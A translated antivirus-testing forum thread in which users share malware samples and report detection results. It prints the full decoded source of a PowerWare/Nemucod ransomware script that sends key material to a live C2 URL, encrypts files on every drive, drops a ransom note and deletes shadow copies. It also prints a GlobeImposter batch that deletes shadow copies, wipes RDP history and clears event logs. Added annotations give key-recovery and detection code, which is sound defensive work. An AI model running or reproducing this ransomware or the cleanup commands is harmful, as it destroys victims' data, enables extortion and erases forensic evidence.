Packs, malware, malicious files, links, etc.
Immunet doesn't see it. Zemana AL only detects it on a deep scan, as Trojan:Generic/Kasatura.A!Ecke
Hitman detects it
Eset SS detects it
Immunet - PC Tools  Firewall Plus
Webroot detects it on execution

Phishing: PayPal

Win32_Ursnif

Behaves like Zbot: steals sensitive information from the infected machine, sniffs the network, steals certificates.

(18.07.2017, 19:30) tachion wrote:

Win32_Ursnif

Behaves like Zbot: steals sensitive information from the infected machine, sniffs the network, steals certificates.

Avast doesn't detect it - sent to the lab
Avira detects it
Comodo doesn't detect it - sent to the lab

Eset SS detects Win32_Ursnif
Kaspersky Free does too
Immunet - PC Tools  Firewall Plus
Ransomware_PowerWare_Nemucod - uses PowerShell

Decoded script:

Code:
# Run-once marker: exit if HKCU\Software\ENCR000\Scripts already exists,
# otherwise create it with a Version=0 value and continue
$khghcshjxnjHJJ = "HKCU:\Software\ENCR000\Scripts"
$KnnOOOjsjjfRFghcs = "Version"
if((Test-Path $khghcshjxnjHJJ) -eq $true)
{exit}
else
{
New-Item -Path $khghcshjxnjHJJ -Force | Out-Null
New-ItemProperty -Path $khghcshjxnjHJJ -Name $KnnOOOjsjjfRFghcs -Value "0" `
-PropertyType DWORD -Force | Out-Null}
# Random alphanumeric strings: 49-char encryption password, 19-char salt, 24-char victim ID
$000073648732648732 = ([chaR[]](geT-RAnDOM -inpUT $(48..57 + 65..90 + 97..122) -CoUnT 49)) -jOIN ""
$467346782779685 = ([Char[]](geT-raNDOm -iNPut $(48..57 + 65..90 + 97..122) -coUNt 19)) -Join ""
$00462458234832 = ([cHaR[]](geT-RanDom -INPut $(48..57 + 65..90 + 97..122) -COuNt 24)) -join ""
# Password, salt and victim ID are POSTed to the C2 in clear text over plain HTTP
# (synchronous MSXML2.XMLHTTP request); a capture of this request holds everything
# needed to rebuild the encryption key
$926225742886527 = "http://m1-systems.xyz/pi.php"
$910827030402006 = "string=$000073648732648732&string2=$467346782779685&uuid=$00462458234832"
$289766261002010 = nEw-OBjECT -coMOBJeCT MSxMl2.Xmlhttp
$289766261002010.oPen('PoST', $926225742886527, $faLse)
$289766261002010.sEtRequestHeader("c"+"oNTENt-TYPE","AppLIcatIoN/X-wwW-fOrM-URL"+"EnCOdeD")
# $post is never assigned anywhere in the script
$289766261002010.setReQuestHeaDer("c"+"ontENT-LengTH", $post.length)
$289766261002010.SetRequeStHeader("cONneCtiOn", "clOSe")
$289766261002010.SeNd($910827030402006)
# Delay before encryption starts
Start-Sleep -Seconds 97
# UTF-16LE bytes of the password (this variable is reused below for file contents)
# and UTF-8 bytes of the salt
[BytE[]]$34623746238743278432462378462378=[SysTem.tExt.EnCODInG]::UniCode.GetBYtes($000073648732648732)
$JGDSDVNIUTGHBQSDGBHHFERFV = [Text.Encoding]::UTF8.GetBytes($467346782779685)
# Rijndael with 16-byte blocks (AES), CBC, zero padding;
# key = 32 bytes from PBKDF2-HMAC-SHA1(password, salt, 5 iterations), i.e. AES-256;
# IV = first 16 bytes of SHA1("alle"), a constant identical on every victim
$hxTgshcYjsjdRgshxjThjsjdJ = new-ObjeCt System.SecuRity.Cryptography.RijndaelMaNaged
$hxTgshcYjsjdRgshxjThjsjdJ.Key = (new-Object Security.CryPtography.RFc2898DeriveBytes $000073648732648732, $JGDSDVNIUTGHBQSDGBHHFERFV, 5).GetBytes(32)
$hxTgshcYjsjdRgshxjThjsjdJ.IV = (neW-Object Security.Cryptography.ShA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
$hxTgshcYjsjdRgshxjThjsjdJ.Padding="ZeRos"
$hxTgshcYjsjdRgshxjThjsjdJ.Mode="CBC"
# Every PSDrive that reports free space (all mounted file systems), sorted descending
$IjhxRgsaghdWdsagdUjjsncRFhgshd= gDr|where {$_.Free}|Sort-Object -Descending
foreach($bGgxjhxRfshdjcTghajsichGhshjdj in $IjhxRgsaghdWdsagdUjjsncRFhgshd){
    # Recurse through the drive for every extension in the list; each matching file is piped into the block below
    gci $bGgxjhxRfshdjcTghajsichGhshjdj.root -RecursE -InClude "*.yuv","*.ycbcra","*.xis","*.x3f","*.x11","*.wpd","*.tex","*.sxg","*.stx","*.st8","*.st5","*.srw","*.srf","*.sr2","*.sqlitedb","*.sqlite3","*.sqlite","*.sdf","*.sda","*.sd0","*.s3db","*.rwz","*.rwl","*.rdb","*.rat","*.raf","*.qby","*.qbx","*.qbw","*.qbr","*.qba","*.py","*.psafe3","*.plc","*.plus_muhd","*.pdd","*.p7c","*.p7b","*.oth","*.orf","*.odm","*.odf","*.nyf","*.nxl","*.nx2","*.nwb","*.ns4","*.ns3","*.ns2","*.nrw","*.nop","*.nk2","*.nef","*.ndd","*.myd","*.mrw","*.moneywell","*.mny","*.mmw","*.mfw","*.mef","*.mdc","*.lua","*.kpdx","*.kdc","*.kdbx","*.kc2","*.jpe","*.incpas","*.iiq","*.ibz","*.ibank","*.hbk","*.gry","*.grey","*.gray","*.fhd","*.fh","*.ffd","*.exf","*.erf","*.erbsql","*.eml","*.dxg","*.drf","*.dng","*.dgc","*.des","*.der","*.ddrw","*.ddoc","*.dcs","*.dc2","*.db_journal","*.csl","*.csh","*.crw","*.craw","*.cib","*.ce2","*.ce1","*.cdrw","*.cdr6","*.cdr5","*.cdr4","*.cdr3","*.bpw","*.bgt","*.bdb","*.bay","*.bank","*.backupdb","*.backup","*.back","*.awg","*.apj","*.ait","*.agdl","*.ads","*.adb","*.acr","*.ach","*.accdt","*.accdr","*.accde","*.ab4","*.3pr","*.3fr","*.vmxf","*.vmsd","*.vhdx","*.vhd","*.vbox","*.stm","*.st7","*.rvt","*.qcow","*.qed","*.pif","*.pdb","*.pab","*.ost","*.ogg","*.nvram","*.ndf","*.m4p","*.m2ts","*.log","*.hpp","*.hdd","*.groups","*.flvv","*.edb","*.dit","*.dat","*.cmt","*.bin","*.aiff","*.xlk","*.wad","*.tlg","*.st6","*.st4","*.say","*.sas7bdat","*.qbm","*.qbb","*.ptx","*.pfx","*.pef","*.pat","*.oil","*.odc","*.nsh","*.nsg","*.nsf","*.nsd","*.nd","*.mos","*.indd","*.iif","*.fpx","*.fff","*.fdb","*.dtd","*.design","*.ddd","*.dcr","*.dac","*.cr2","*.cdx","*.cdf","*.blend","*.bkp","*.al","*.adp","*.act","*.xlr","*.xlam","*.xla","*.wps","*.tga","*.rw2","*.r3d","*.pspimage","*.ps","*.pct","*.pcd","*.m4v","*.fxg","*.flac","*.eps","*.dxb","*.drw","*.dot","*.db3","*.cpi","*.cls","*.cdr","*.arw","*.ai","*.aac","*.thm","*.srt","*.save","*.safe","*.rm","*.pwm","*.pages","*.obj","*.mlb","*.md","*.mbx","*.lit","*.laccdb","*.kwm","*.idx","*.html","*.flf","*.dxf","*.dwg","*.dds","*.csv","*.css","*.config","*.cfg","*.cer","*.asx","*.aspx","*.aoi","*.accdb","*.7zip","*.1cd","*.xls","*.wab","*.rtf","*.prf","*.ppt","*.oab","*.msg","*.mapimail","*.jnt","*.doc","*.dbx","*.contact","*.n64","*.m4a","*.m4u","*.m3u","*.mid","*.wma","*.flv","*.3g2","*.mkv","*.3gp","*.mp4","*.mov","*.avi","*.asf","*.mpeg","*.vob","*.mpg","*.wmv","*.fla","*.swf","*.wav","*.mp3","*.qcow2","*.vdi","*.vmdk","*.vmx","*.wallet","*.upk","*.sav","*.re4","*.ltx","*.litesql","*.litemod","*.lbf","*.iwi","*.forge","*.das","*.d3dbsp","*.bsa","*.bik","*.asset","*.apk","*.gpg","*.aes","*.ARC","*.PAQ","*.tar.bz2","*.tbk","*.bak","*.tar","*.tgz","*.gz","*.7z","*.rar","*.zip","*.djv","*.djvu","*.svg","*.bmp","*.png","*.gif","*.raw","*.cgm","*.jpeg","*.jpg","*.tif","*.tiff","*.NEF","*.psd","*.cmd","*.bat","*.sh","*.class","*.jar","*.java","*.rb","*.asp","*.cs","*.brd","*.sch","*.dch","*.dip","*.pl","*.vbs","*.vb","*.js","*.asm","*.pas","*.cpp","*.php","*.ldf","*.mdf","*.ibd","*.MYI","*.MYD","*.frm","*.odb","*.dbf","*.db","*.mdb","*.sql","*.SQLITEDB","*.SQLITE3","*.011","*.010","*.009","*.008","*.007","*.006","*.005","*.004","*.003","*.002","*.001","*.pst","*.onetoc2","*.asc","*.lay6","*.lay","*.ms11","*.sldm","*.sldx","*.ppsm","*.ppsx","*.ppam","*.docb","*.mml","*.sxm","*.otg","*.odg","*.uop","*.potx","*.potm","*.pptx","*.pptm","*.std","*.sxd","*.pot","*.pps","*.sti","*.sxi","*.otp","*.odp","*.wb2","*.123","*.wks","*.wk1","*.xltx","*.xltm","*.xlsx","*.xlsm","*.xlsb","*.slk","*.xlw","*.xlt","*.xlm","*.xlc","*.dif","*.stc","*.sxc","*.ots","*.ods","*.hwp","*.602","*.dotm","*.dotx","*.docm","*.docx","*.DOT","*.3dm","*.max","*.3ds","*.xml","*.txt","*.CSV","*.uot","*.RTF","*.pdf","*.XLS","*.PPT","*.stw","*.sxw","*.ott","*.odt","*.DOC","*.pem","*.p12","*.csr","*.crt","*.key"|%{
        try{
            # Open the file read/write and read only its first min(length, 4096) bytes;
            # everything after that is left untouched
            $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh = New-Object SyStem.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
            if ($sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.BaseStream.Length -lt 4096){
                       $hxTgashdnUjuwjdcTgshdnRfgshd = $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.BaseStream.Length
                       }
            else
            {
                       $hxTgashdnUjuwjdcTgshdnRfgshd = 4096
            }
           $34623746238743278432462378462378 = $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.ReadByTes($hxTgashdnUjuwjdcTgshdnRfgshd)
            $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.Close()
            # Encrypt that chunk (a chunk shorter than 4096 bytes is zero-padded to a 16-byte boundary)
            $xYhsjcRtsghhIIIahdhHshIOKKJ = $hxTgshcYjsjdRgshxjThjsjdJ.CreateEncRyPtor()
            $YhchcRgsghxYhshdcThgh = new-Object IO.MemoryStream
            $GshshdTgshxJuahxthH = new-Object Security.Cryptography.CryptoStream $YhchcRgsghxYhshdcThgh,$xYhsjcRtsghhIIIahdhHshIOKKJ,"Write"
            $GshshdTgshxJuahxthH.Write($34623746238743278432462378462378, 0,$34623746238743278432462378462378.Length)
            $GshshdTgshxJuahxthH.Close()
            $YhchcRgsghxYhshdcThgh.Close()
            $xYhsjcRtsghhIIIahdhHshIOKKJ.Clear()
            $IjxmxRgshhdYHhajhxRtasghhdI = $YhchcRgsghxYhshdcThgh.ToArray()
            # Overwrite the start of the file in place with the ciphertext;
            # a short file grows by the padding, the file name is not changed
            $OlskcTshcUjsmcTgshdjJJ = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
            $OlskcTshcUjsmcTgshdjJJ.Write($IjxmxRgshhdYHhajhxRtasghhdI,0,$IjxmxRgshhdYHhajhxRtasghhdI.Length)
            $OlskcTshcUjsmcTgshdjJJ.Close()
            # Ransom note, one per directory; the base64 below is the note's HTML
            # (it claims RSA-2048 and AES-128 and points to a .onion address)
            $bcyHsjhjxRtgahdhPoajndcTghshcJJ = $_.Directory.ToString() + '\_README-Encrypted-Files.html'
           $OkxxRtgshYHjsjcUjajxYhshjc = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGZvbnQgZmFjZT0ibW9ub3NwYWNlIj48aDE+ISEhIElNUE9SVEFOVCBJTkZPUk1BVElPTiAhISEhPC9oMT48YnI+DQoNCkFsbCBvZiB5b3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgd2l0aCBSU0EtMjA0OCBhbmQgQUVTLTEyOCBjaXBoZXJzLjxicj4NCk1vcmUgaW5mb3JtYXRpb24gYWJvdXQgdGhlIFJTQSBhbmQgQUVTIGNhbiBiZSBmb3VuZCBoZXJlOjxicj4NCjxhIGhyZWY9Imh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUlNBXyhjcnlwdG9zeXN0ZW0pIj5odHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL1JTQV8oY3J5cHRvc3lzdGVtKTwvYT48YnI+DQo8YSBocmVmPSJodHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL0FkdmFuY2VkX0VuY3J5cHRpb25fU3RhbmRhcmQiPmh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvQWR2YW5jZWRfRW5jcnlwdGlvbl9TdGFuZGFyZDwvYT48YnI+DQogICANCjxwPkRlY3J5cHRpbmcgb2YgeW91ciBmaWxlcyBpcyBPTkxZIHBvc3NpYmxlIHdpdGggdGhlIHByaXZhdGUga2V5IGFuZCBkZWNyeXB0IHByb2dyYW0sIHdoaWNoIGlzIG9uIG91ciBzZWNyZXQgc2VydmVyLjxicj4NCg0KVG8gcmVjZWl2ZSB5b3VyIHByaXZhdGUga2V5IGZvbGxvdyB0aGlzIGxpbms6PGJyPg0KDQoxLiA8YSBocmVmPSJodHRwOi8vN2h1dXlqaW9pc3RibHVjby5vbmlvbi50byI+aHR0cDovLzdodXV5amlvaXN0Ymx1Y28ub25pb24udG88L2E+PGJyPg0KDQo8cD5JZiB0aGUgYWRkcmVzcyBpcyBub3QgYXZhaWxhYmxlLCBmb2xsb3cgdGhlc2Ugc3RlcHM6PGJyPg0KMS4gRG93bmxvYWQgYW5kIGluc3RhbGwgVG9yIEJyb3dzZXI6IDxhIGhyZWY9Imh0dHBzOi8vd3d3LnRvcnByb2plY3Qub3JnL2Rvd25sb2FkL2Rvd25sb2FkLWVhc3kuaHRtbCI+aHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvZG93bmxvYWQvZG93bmxvYWQtZWFzeS5odG1sPC9hPjxicj4NCjIuIEFmdGVyIGEgc3VjY2Vzc2Z1bCBpbnN0YWxsYXRpb24sIHJ1biB0aGUgYnJvd3NlciBhbmQgd2FpdCBmb3IgaW5pdGlhbGl6YXRpb24uPGJyPg0KMy4gVHlwZSBpbiB0aGUgYWRkcmVzcyBiYXI6IDdodXV5amlvaXN0Ymx1Y28ub25pb248YnI+DQo0LiBGb2xsb3cgdGhlIGluc3RydWN0aW9ucyBvbiB0aGUgc2l0ZS48YnI+PC9mb250Pg=="));
            if(!(Test-path($bcyHsjhjxRtgahdhPoajndcTghshcJJ))){
            New-IteM -Path $bcyHsjhjxRtgahdhPoajndcTghshcJJ -ItemTyPe file -Value $OkxxRtgshYHjsjcUjajxYhshjc
            # The victim ID generated above is appended so the operator can match the note to the POSTed key material
            AdD-Content -PAth $bcyHsjhjxRtgahdhPoajndcTghshcJJ -VaLue ("<p><font face'monospace'><h1>!!! Your Personal identification ID: $00462458234832</p></font></h1>")
            }}
               catch
               {
               # Errors (locked files, access denied) are silently ignored
               }
       }}
# Delete every Volume Shadow Copy through WMI so "previous versions" cannot be restored
$2885456708 = Get-WmiObjEct Win32_ShadoWCopy
ForEach($019384882892 in $2885456708) {
$019384882892.Delete()
}
exit
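The script above sends its password, salt and victim ID to the C2 unencrypted (an HTTP POST) before it encrypts anything, and it only encrypts the first 4096 bytes of each file in place. A packet capture or proxy log of that request is therefore enough to rebuild the key. The following is an added example, not part of the original post and not the malware's own code: PowerShell that derives the key exactly as the script does and reverses the in-place encryption. The function names, the POST body and the file content are mine and constructed for the demo.

```powershell
# Added example (not from the original post): key recovery and file restoration for the
# decoded PowerWare/Nemucod script above. Assumes the C2 POST body was captured, in the
# script's own format: string=<password>&string2=<salt>&uuid=<victim id>

function Get-PowerWareKeyMaterial {
    param([Parameter(Mandatory)][string]$PostBody)
    $fields = @{}
    foreach ($pair in $PostBody.Split('&')) {
        $name, $value = $pair -split '=', 2
        $fields[$name] = $value
    }
    # The script does (Rfc2898DeriveBytes $password, [UTF8 bytes of salt], 5).GetBytes(32):
    # PBKDF2-HMAC-SHA1, 5 iterations, 32-byte key (AES-256). The 19-char salt is above the
    # 8-byte minimum the class enforces.
    $saltBytes = [Text.Encoding]::UTF8.GetBytes($fields['string2'])
    $kdf  = New-Object -TypeName Security.Cryptography.Rfc2898DeriveBytes -ArgumentList $fields['string'], $saltBytes, 5
    $sha1 = New-Object Security.Cryptography.SHA1Managed
    [pscustomobject]@{
        Key  = $kdf.GetBytes(32)
        # The IV is a constant: first 16 bytes of SHA1("alle"), the same for every victim
        IV   = [byte[]]($sha1.ComputeHash([Text.Encoding]::UTF8.GetBytes('alle'))[0..15])
        Uuid = $fields['uuid']
    }
}

function New-PowerWareCipher {
    param([byte[]]$Key, [byte[]]$IV)
    # Same settings as the script: Rijndael with 16-byte blocks (= AES), CBC, zero padding
    $aes = New-Object Security.Cryptography.RijndaelManaged
    $aes.Key = $Key
    $aes.IV = $IV
    $aes.Padding = 'Zeros'
    $aes.Mode = 'CBC'
    return $aes
}

function Invoke-PowerWareEncrypt {
    # Reproduces what the script does to one file's bytes, for the round trip at the bottom
    param([byte[]]$Content, $KeyMaterial)
    $chunkLen   = [Math]::Min($Content.Length, 4096)
    $encryptor  = (New-PowerWareCipher $KeyMaterial.Key $KeyMaterial.IV).CreateEncryptor()
    $cipherText = $encryptor.TransformFinalBlock($Content, 0, $chunkLen)
    # Ciphertext goes to offset 0 over the existing bytes: anything past the chunk survives,
    # and a file shorter than 4096 bytes that is not 16-byte aligned grows by its zero padding
    $out = New-Object byte[] ([Math]::Max($Content.Length, $cipherText.Length))
    [Array]::Copy($Content, $out, $Content.Length)
    [Array]::Copy($cipherText, $out, $cipherText.Length)
    return ,$out
}

function Restore-PowerWareBytes {
    param([byte[]]$Encrypted, $KeyMaterial)
    # After the script ran, the ciphertext occupies the first min(length, 4096) bytes and
    # is always a whole number of blocks; anything else is not this script's layout
    $chunkLen = [Math]::Min($Encrypted.Length, 4096)
    if ($chunkLen % 16 -ne 0) { throw "unexpected layout: $chunkLen-byte ciphertext is not block aligned" }
    $decryptor = (New-PowerWareCipher $KeyMaterial.Key $KeyMaterial.IV).CreateDecryptor()
    $plain = $decryptor.TransformFinalBlock($Encrypted, 0, $chunkLen)
    $out = [byte[]]$Encrypted.Clone()
    [Array]::Clear($out, 0, $chunkLen)          # also covers a runtime that strips zero padding on decrypt
    [Array]::Copy($plain, $out, $plain.Length)
    # Zero padding cannot be told from data: for a file that was shorter than 4096 bytes and
    # not 16-byte aligned, the original length has to come from the file format itself
    return ,$out
}

function Restore-PowerWareFile {
    param([Parameter(Mandatory)][string]$Path, [Parameter(Mandatory)]$KeyMaterial)
    $restored = Restore-PowerWareBytes ([IO.File]::ReadAllBytes($Path)) $KeyMaterial
    [IO.File]::WriteAllBytes("$Path.restored", $restored)   # never overwrite the only copy
}

# Demo on constructed data: a "captured" POST body in the script's format
# (49/19/24 characters) and a 111-byte document (not 16-byte aligned, so it grows by one byte)
$capturedPost = 'string=' + ('A' * 49) + '&string2=' + ('B' * 19) + '&uuid=' + ('C' * 24)
$keyMaterial  = Get-PowerWareKeyMaterial -PostBody $capturedPost
$original     = [Text.Encoding]::ASCII.GetBytes('Quarterly report, do not distribute. ' * 3)
$encrypted    = Invoke-PowerWareEncrypt $original $keyMaterial
$restored     = Restore-PowerWareBytes $encrypted $keyMaterial
$roundTrip    = [Convert]::ToBase64String($restored, 0, $original.Length) -eq [Convert]::ToBase64String($original)
"victim id $($keyMaterial.Uuid): encrypted length $($encrypted.Length), restored matches original: $roundTrip"
```

When several hosts were hit, the `uuid` field of each POST is the same value the script appends to `_README-Encrypted-Files.html` as the "Personal identification ID", which is how to pair a capture with a machine. Run `Restore-PowerWareFile` against copies; for files that were shorter than 4096 bytes, up to 15 trailing zero bytes may remain and only the file's format tells whether they were padding.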
Ransomware_Globeimposter

Code:
@echo off
rem Delete every Volume Shadow Copy so "previous versions" cannot be restored
vssadmin.exe Delete Shadows /All /Quiet
rem Wipe the RDP client history (recent hosts and saved servers) and recreate an empty Servers key
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
rem Strip the system and hidden attributes from Default.rdp in Documents and delete it
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
rem Enumerate every event log and clear it (clearing a log itself leaves a 1102/104 clear-log record)
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
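Every step of that batch runs an external program whose command line lands in process-creation telemetry (Sysmon event 1, Windows security event 4688), and the combination is far more telling than any single command. The following is an added example, not part of the original post: detection logic run over such command lines. The rule names, function names and sample events are mine and constructed for the demo.

```powershell
# Added example (not from the original post): flag the GlobeImposter cleanup batch from
# process-creation command lines. Only the external programs the batch starts (vssadmin,
# reg, attrib, wevtutil) appear in this telemetry; "cd" and "del" are cmd.exe built-ins
# and never create a process, so they are not in the rules.

$CleanupRules = @(
    @{ Name = 'ShadowCopyDeletion'; Pattern = '\bvssadmin(\.exe)?\s+delete\s+shadows\b' }
    @{ Name = 'RdpHistoryWipe';     Pattern = '\breg(\.exe)?\s+delete\s+.*Terminal Server Client' }
    @{ Name = 'DefaultRdpUnhide';   Pattern = '\battrib(\.exe)?\s+.*Default\.rdp' }
    @{ Name = 'EventLogClear';      Pattern = '\bwevtutil(\.exe)?\s+(cl|clear-log)\b' }
)

function Find-CleanupActivity {
    # One hit per (event, rule) pair; -match is case-insensitive in PowerShell by default
    param([Parameter(Mandatory)][object[]]$Events, [object[]]$Rules = $CleanupRules)
    foreach ($evt in $Events) {
        foreach ($rule in $Rules) {
            if ($evt.CommandLine -match $rule.Pattern) {
                [pscustomobject]@{
                    Time            = $evt.Time
                    Rule            = $rule.Name
                    ParentProcessId = $evt.ParentProcessId
                    ParentImage     = $evt.ParentImage
                    CommandLine     = $evt.CommandLine
                }
            }
        }
    }
}

function Get-CleanupAlert {
    # The batch fires all four techniques from one cmd.exe within seconds, while a lone
    # vssadmin or wevtutil call is routine admin work. Alert on the cluster: at least
    # $MinRules distinct rules under the same parent process.
    param([Parameter(Mandatory)][object[]]$Events, [int]$MinRules = 3)
    Find-CleanupActivity -Events $Events |
        Group-Object -Property ParentProcessId |
        ForEach-Object {
            $distinct = @($_.Group.Rule | Sort-Object -Unique)
            if ($distinct.Count -ge $MinRules) {
                [pscustomobject]@{
                    ParentProcessId = $_.Name
                    ParentImage     = $_.Group[0].ParentImage
                    Rules           = $distinct -join ','
                    FirstSeen       = ($_.Group.Time | Sort-Object)[0]
                    Commands        = $_.Group.Count
                }
            }
        }
}

# Constructed sample: the batch run from one cmd.exe (parent 3120), plus two benign events
# that match a rule on their own but should not raise an alert
$sampleEvents = @(
    [pscustomobject]@{ Time = '2017-08-16T20:31:02'; ParentProcessId = 3120; ParentImage = 'C:\Windows\System32\cmd.exe'; CommandLine = 'vssadmin.exe Delete Shadows /All /Quiet' }
    [pscustomobject]@{ Time = '2017-08-16T20:31:02'; ParentProcessId = 3120; ParentImage = 'C:\Windows\System32\cmd.exe'; CommandLine = 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f' }
    [pscustomobject]@{ Time = '2017-08-16T20:31:02'; ParentProcessId = 3120; ParentImage = 'C:\Windows\System32\cmd.exe'; CommandLine = 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f' }
    [pscustomobject]@{ Time = '2017-08-16T20:31:03'; ParentProcessId = 3120; ParentImage = 'C:\Windows\System32\cmd.exe'; CommandLine = 'attrib Default.rdp -s -h' }
    [pscustomobject]@{ Time = '2017-08-16T20:31:03'; ParentProcessId = 3120; ParentImage = 'C:\Windows\System32\cmd.exe'; CommandLine = 'wevtutil.exe cl "Security"' }
    [pscustomobject]@{ Time = '2017-08-16T20:31:03'; ParentProcessId = 3120; ParentImage = 'C:\Windows\System32\cmd.exe'; CommandLine = 'wevtutil.exe cl "System"' }
    [pscustomobject]@{ Time = '2017-08-16T20:40:10'; ParentProcessId = 5004; ParentImage = 'C:\Program Files\Backup\agent.exe'; CommandLine = 'vssadmin list shadows' }
    [pscustomobject]@{ Time = '2017-08-16T20:45:55'; ParentProcessId = 6200; ParentImage = 'C:\Windows\System32\cmd.exe'; CommandLine = 'wevtutil cl Application' }
)

Find-CleanupActivity -Events $sampleEvents | Format-Table -AutoSize
Get-CleanupAlert     -Events $sampleEvents | Format-Table -AutoSize
```

`Find-CleanupActivity` is the raw hit list for hunting; `Get-CleanupAlert` is what belongs on a dashboard. Feeding it real data is a matter of mapping your source's fields (for Sysmon event 1: `UtcTime`, `ParentProcessId`, `ParentImage`, `CommandLine`) onto the same property names.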
NOD32 detects it
ESET NOD32 Antivirus 
Zemana AntiMalware (Premium)
Immunet detects it
Immunet - PC Tools  Firewall Plus
Kaspersky Free detects it.
F-Secure SAFE 18.2
Polish Ransomware_ClicoCrypter

AppCheck Anti-Ransomware blocks it on execution

(16.08.2017, 20:38) tachion wrote:

Polish Ransomware_ClicoCrypter

Kaspersky free - 1/1
Comodo 0/1 - sent to the lab.

(16.08.2017, 20:38) tachion wrote:

Polish Ransomware_ClicoCrypter

Arcabit Internet Security 1/1
(16.08.2017, 20:38) tachion wrote:

Polish Ransomware_ClicoCrypter

NOD32 detects it
ESET NOD32 Antivirus 
Zemana AntiMalware (Premium)
Trojan Downloader_Hancitor_Pony

(17.08.2017, 21:09) tachion wrote:

Trojan Downloader_Hancitor_Pony

Kaspersky free 1/1
Comodo 0/1 - sent to the lab

This ransomware with the RTV licence fee must be a government one :D
1. I'm always right.
2. If I'm not right, see point 1.
What can I say... hello after a very long break. You surely missed me and my little packs (suspicious)... but let's get to the point. Besides the pack I'm also adding an analysis of the antivirus engines in a txt file.


[Malware Pack] Aug 2017 #23:

Windows Defender 20/23 (86.95%)